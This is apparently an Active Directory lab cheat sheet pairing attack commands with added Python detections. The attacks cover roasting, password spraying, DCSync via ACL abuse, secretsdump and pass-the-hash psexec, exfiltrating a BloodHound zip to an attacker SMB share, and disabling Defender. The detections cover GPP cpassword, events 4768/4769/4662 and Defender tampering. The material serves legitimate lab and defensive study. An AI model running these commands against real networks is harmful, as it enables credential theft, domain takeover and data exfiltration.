Initial access
SMB Enumeration
smbmap -H 10.10.10.100
smbmap -H 10.10.10.100 -R # recursive
smbmap -H 10.10.10.192 -u null
smbmap -H 10.10.10.100 -d domain.local -u USERNAME -p PASSWORD
smbclient \\\\10.10.10.169\\NETLOGON -U 'melanie'%'Welcome123!'
If you have access to the GPO policies in SYSVOL, search for cpassword values in "domain.local/Policies/{xx-xx-xx}/MACHINE/Preferences/Groups/Groups.xml" (Group Policy Preferences) and decrypt with
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
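The cpassword field is the reason MS14-025 removed the feature, but old policy files often survive in SYSVOL. The audit below is an added defender-side example and is not part of the original cheat sheet: it walks a SYSVOL-like tree, parses the Group Policy Preferences XML files that can embed credentials, and reports every element that still carries a cpassword attribute. The directory layout, the sample Groups.xml, the GUID and the account name are constructed.

```python
"""Audit a SYSVOL copy for Group Policy Preferences files that still carry
cpassword attributes (MS14-025). Added defender-side example, not part of the
original cheat sheet; the directory layout and sample XML are constructed."""
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP files that may embed credentials (file names from the GPP schema).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Constructed sample resembling the Groups.xml the cheat sheet points at.
SAMPLE_GROUPS_XML = """<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="svc_backup"
        image="2" changed="2019-10-18 03:53:24" uid="{CONSTRUCTED-UID}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="CONSTRUCTED-CPASSWORD-VALUE"
                changeLogon="0" noChange="1" neverExpires="1"
                acctDisabled="0" userName="svc_backup"/>
  </User>
</Groups>
"""

def find_cpasswords_in_xml(xml_text):
    """Return (tag, userName, cpassword) for every element carrying cpassword."""
    hits = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        cpw = elem.attrib.get("cpassword")
        if cpw:  # an empty string means the field was cleared; only flag real values
            hits.append((elem.tag, elem.attrib.get("userName", ""), cpw))
    return hits

def audit_sysvol(sysvol_root):
    """Walk a SYSVOL-like tree and report every GPP file with cpassword set."""
    findings = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8") as fh:
                    hits = find_cpasswords_in_xml(fh.read())
            except ET.ParseError:
                continue  # malformed XML is not a GPP credential leak; skip it
            for tag, user, _cpw in hits:
                findings.append((path, tag, user))
    return findings

def demo():
    """Build a constructed SYSVOL tree, run the audit and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        gpp_dir = os.path.join(tmp, "domain.local", "Policies",
                               "{CONSTRUCTED-GUID}", "MACHINE",
                               "Preferences", "Groups")
        os.makedirs(gpp_dir)
        with open(os.path.join(gpp_dir, "Groups.xml"), "w",
                  encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return [(os.path.relpath(p, tmp), tag, user)
                for p, tag, user in audit_sysvol(tmp)]

if __name__ == "__main__":
    for path, tag, user in demo():
        print(f"cpassword found: {path} <{tag}> userName={user}")
```

Point it at a mounted or copied SYSVOL root; any hit means the credential must be rotated, not just the file deleted, since the value has been readable by every domain user since the policy was written.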
ASREPRoast
Finding users that don't require Kerberos pre-authentication.
For such a user we can send an AS-REQ to the DC and receive an AS-REP whose encrypted part is derived from the user's password hash; we can crack it offline to recover the password.
python3 GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip=10.10.10.161 -format hashcat -outputfile hash
hashcat -m 18200 --force -a 0 hash /usr/share/wordlists/rockyou.txt
Kerberoast
python3 GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -outputfile hashes
john hashes --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs
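Both of the roasting techniques above leave traces in the DC's Security log: an AS-REP roast shows up as event 4768 with Pre-Authentication Type 0, and a Kerberoast as event 4769 requesting an RC4-HMAC (0x17) service ticket for a user-account SPN. The code below is an added defender-side example, not part of the original cheat sheet: it checks userAccountControl values for the DONT_REQUIRE_PREAUTH bit and classifies 4768/4769 events. The event records are constructed (field names follow the Windows event XML; the IPs and account names are sample values).

```python
"""Flag AS-REP roasting and Kerberoasting candidates in Kerberos audit events.
Added defender-side example, not part of the original cheat sheet. Event IDs
4768/4769 and their field names are from the Windows Security log; the event
records below are constructed, not captured."""

# userAccountControl bit meaning "Kerberos pre-authentication not required"
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Encryption type 0x17 is RC4-HMAC; its ticket/AS-REP material is what the
# cracking tools above work on, so RC4 requests stand out against AES (0x12).
RC4_HMAC = "0x17"

# Constructed events: dicts keyed by the field names a 4768/4769 record uses.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "melanie", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "PreAuthType": "2", "IpAddress": "10.10.10.50"},
    {"EventID": 4768, "TargetUserName": "svc_noauth", "ServiceName": "krbtgt",
     "TicketEncryptionType": RC4_HMAC, "PreAuthType": "0", "IpAddress": "10.10.14.6"},
    {"EventID": 4769, "TargetUserName": "melanie@DOMAIN.LOCAL", "ServiceName": "DC01$",
     "TicketEncryptionType": "0x12", "TicketOptions": "0x40810000", "IpAddress": "10.10.10.50"},
    {"EventID": 4769, "TargetUserName": "melanie@DOMAIN.LOCAL", "ServiceName": "SVC_TGS",
     "TicketEncryptionType": RC4_HMAC, "TicketOptions": "0x40810000", "IpAddress": "10.10.14.6"},
]

def accounts_without_preauth(users):
    """From (sAMAccountName, userAccountControl) pairs return the accounts
    exposed to AS-REP roasting, i.e. those with the DONT_REQUIRE_PREAUTH bit set."""
    return [name for name, uac in users if uac & UF_DONT_REQUIRE_PREAUTH]

def classify_event(ev):
    """Return a finding label or None for a single 4768/4769 event."""
    if ev["EventID"] == 4768 and ev.get("PreAuthType") == "0":
        # AS-REQ accepted without pre-authentication: AS-REP roast candidate
        return "asrep-roast"
    if (ev["EventID"] == 4769 and ev.get("TicketEncryptionType") == RC4_HMAC
            and not ev["ServiceName"].endswith("$")
            and ev["ServiceName"].lower() != "krbtgt"):
        # RC4 service ticket for an SPN on a user account: Kerberoast candidate
        return "kerberoast"
    return None

def find_roasting(events):
    """Return (label, target, service, source_ip) for each suspicious event."""
    findings = []
    for ev in events:
        label = classify_event(ev)
        if label:
            findings.append((label, ev["TargetUserName"],
                             ev["ServiceName"], ev["IpAddress"]))
    return findings

if __name__ == "__main__":
    print(accounts_without_preauth([("svc_noauth", 0x410200), ("melanie", 0x10200)]))
    for finding in find_roasting(SAMPLE_EVENTS):
        print(*finding)
```

A single RC4 4769 is not conclusive where legacy systems still negotiate RC4; in practice you baseline per source address and alert on one client requesting RC4 tickets for many distinct SPNs in a short window, which is exactly the pattern GetUserSPNs.py -request produces. Removing the DONT_REQUIRE_PREAUTH flag and moving service accounts to long random passwords or gMSAs closes both findings at the source.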
enum4linux
enum4linux -a 10.10.10.175
Rpcclient
rpcclient -U "" -N 10.10.10.169
enumdomusers
querydispinfo
ldapsearch
ldapsearch -H ldap://EGOTISTICAL-BANK.LOCAL:389/ -x -s base -b '' "(objectClass=*)" "*" +
ldapdomaindump
ldapdomaindump -u 'domain.local\user' -p PASSWORD 10.10.10.103 -o ldap/
ldapdomaindump ldap://10.10.10.100:389 -u 'domain.local\user' -p 'PASSWORD' -at SIMPLE
DNS enumeration
dig srv _ldap._tcp.dc._msdcs.DOMAIN.LOCAL @10.10.10.175
kerbrute
kerbrute userenum -d domain.LOCAL xato-net-10-million-usernames.txt --dc 10.10.10.175
Password enumeration
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.10.10.175 ldap2 -V -f
crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!' --continue-on-success
Privesc
Enumeration tools
Change passwords of users with higher privileges
rpcclient //site.dom.local -U dom.local/USERNAME%PASSWORD
setuserinfo2 username 23 password
DCSync attack
(requires a foothold on a domain-joined host to run the PowerView commands below)
Find principals whose ACL on the domain object allows DCSync (replication rights, GenericAll or WriteDacl) using PowerView:
Get-ObjectAcl -DistinguishedName "dc=domain,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')} | foreach{get-adobject -identity $_.SecurityIdentifier}
net group "Exchange Windows Permissions" xnull /add /domain
$pass = convertto-securestring 'password-1234' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\xnull', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity "xnull" -Rights DCSync
Then remotely:
python3 secretsdump.py xnull:password-1234@10.10.10.161
python3 psexec.py forest.htb.local/administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
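Every secretsdump.py run against a DC is a replication request, and with "Audit Directory Service Access" enabled it is logged as event 4662 on the domain object with the replication control-access GUIDs in the Properties field. The detection below is an added defender-side example, not part of the original cheat sheet: it extracts those GUIDs from 4662 records and flags any principal other than a known DC computer account. The three GUIDs are the standard AD schema values; the event records and the set of DC account names are constructed.

```python
"""Detect DCSync-style replication requests in Directory Service Access events
(4662). Added defender-side example, not part of the original cheat sheet. The
three rights GUIDs are the standard AD schema values; the event records and
the list of domain controller accounts are constructed."""

REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Accounts expected to replicate: DC computer accounts (constructed names).
KNOWN_DC_ACCOUNTS = {"FOREST$", "DC02$"}

# Constructed 4662 records. Properties carries the rights GUIDs the way the
# Security log renders them; AccessMask 0x100 is "control access".
SAMPLE_4662 = [
    {"SubjectUserName": "FOREST$", "SubjectDomainName": "HTB",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "AccessMask": "0x100"},
    {"SubjectUserName": "xnull", "SubjectDomainName": "HTB",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "AccessMask": "0x100"},
    {"SubjectUserName": "melanie", "SubjectDomainName": "HTB",
     "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}",
     "Properties": "{bf967a0a-0de6-11d0-a285-00aa003049e2}",
     "AccessMask": "0x10"},
]

def replication_rights_used(properties_field):
    """Return the names of replication rights referenced in a Properties field."""
    rights = []
    for token in properties_field.replace("{", " ").replace("}", " ").split():
        name = REPLICATION_GUIDS.get(token.lower())
        if name:
            rights.append(name)
    return rights

def detect_dcsync(events, known_dc_accounts=KNOWN_DC_ACCOUNTS):
    """Flag 4662 events where a principal other than a known DC account
    exercised replication rights (Get-Changes, Get-Changes-All, ...)."""
    findings = []
    for ev in events:
        rights = replication_rights_used(ev["Properties"])
        if not rights:
            continue
        if ev["SubjectUserName"].upper() in known_dc_accounts:
            continue  # normal DC-to-DC replication
        who = f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}'
        findings.append((who, rights))
    return findings

if __name__ == "__main__":
    for who, rights in detect_dcsync(SAMPLE_4662):
        print(f"replication rights used by non-DC principal {who}: {', '.join(rights)}")
```

Two caveats: 4662 is only emitted if the domain object's SACL audits control access for the relevant principals, and legitimate non-DC holders of these rights (Azure AD Connect sync accounts, some backup products) need to be added to the allowlist rather than ignored. The Get-ObjectAcl query above is the same check from the other side; running it periodically and diffing the result catches the Add-DomainObjectAcl step before the secretsdump.py step happens.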
Exfiltration
SMB Server
On attacker machine:
smbserver.py share . -smb2support -username xnull -password xnull
On victim machine:
net use \\10.10.14.6\share /u:xnull xnull
copy 20191018035324_BloodHound.zip \\10.10.14.6\share\
AV Bypass
Disable real-time monitoring
Set-MpPreference -DisableRealtimeMonitoring $true
List exclusion paths
Get-MpPreference | Select-Object -Property ExclusionPath -ExpandProperty ExclusionPath
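Both of the Set-MpPreference changes above are recorded in the Microsoft-Windows-Windows Defender/Operational log: 5001 when real-time protection is turned off and 5007 whenever the configuration changes, including a new exclusion path. The parser below is an added defender-side example, not part of the original cheat sheet; the log lines are constructed to resemble the rendered event messages (timestamp, event ID, message) and the registry paths in them are the ones Defender uses for exclusions and real-time protection.

```python
"""Parse Microsoft-Windows-Windows Defender/Operational events for tampering:
5001 (real-time protection disabled) and 5007 (configuration changed, e.g. an
exclusion path added). Added defender-side example, not part of the original
cheat sheet; the log lines are constructed to resemble the rendered messages."""
import re

# Constructed lines in the form "<timestamp> <event id> <message>".
SAMPLE_LOG = """\
2019-10-18T03:50:01 5007 Windows Defender Antivirus Configuration has changed. Old value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Scan\\ScheduleTime = 0x78 New value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Scan\\ScheduleTime = 0x80
2019-10-18T03:53:10 5007 Windows Defender Antivirus Configuration has changed. Old value:  New value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Users\\Public\\tools = 0x0
2019-10-18T03:53:24 5001 Windows Defender Antivirus Real-time Protection is disabled.
2019-10-18T03:53:24 5007 Windows Defender Antivirus Configuration has changed. Old value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring = 0x0 New value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring = 0x1
"""

LINE_RE = re.compile(r"^(\S+)\s+(\d+)\s+(.*)$")
# The "New value:" clause is last in a 5007 message: "<registry key> = <hex>".
NEW_VALUE_RE = re.compile(r"New value:\s*(.*?)\s*=\s*(0x[0-9a-fA-F]+)\s*$")

def parse_line(line):
    """Split one constructed log line into time, event id and message."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, eid, msg = m.groups()
    return {"time": ts, "id": int(eid), "message": msg}

def classify(event):
    """Return (label, detail) for a tampering event, or None for benign ones."""
    if event["id"] == 5001:
        return ("realtime-disabled", "")
    if event["id"] == 5007:
        m = NEW_VALUE_RE.search(event["message"])
        if m:
            key, value = m.groups()
            if "\\Exclusions\\" in key:
                # Detail is the part after Exclusions\: Paths\..., Processes\..., Extensions\...
                return ("exclusion-added", key.rsplit("\\Exclusions\\", 1)[1])
            if key.endswith("\\DisableRealtimeMonitoring") and value != "0x0":
                return ("realtime-disabled-via-policy", key)
    return None

def find_tampering(log_text):
    """Return (time, event id, label, detail) for every tampering event found."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if not ev:
            continue
        label = classify(ev)
        if label:
            findings.append((ev["time"], ev["id"]) + label)
    return findings

if __name__ == "__main__":
    for finding in find_tampering(SAMPLE_LOG):
        print(*finding)
```

Scheduled-scan time changes and other routine 5007 events fall through as benign; only exclusions and real-time protection flips are reported. The durable fix is Tamper Protection, which makes Set-MpPreference -DisableRealtimeMonitoring a no-op for local administrators, plus forwarding this log so the 5001/5007 pair cannot simply be cleared on the host.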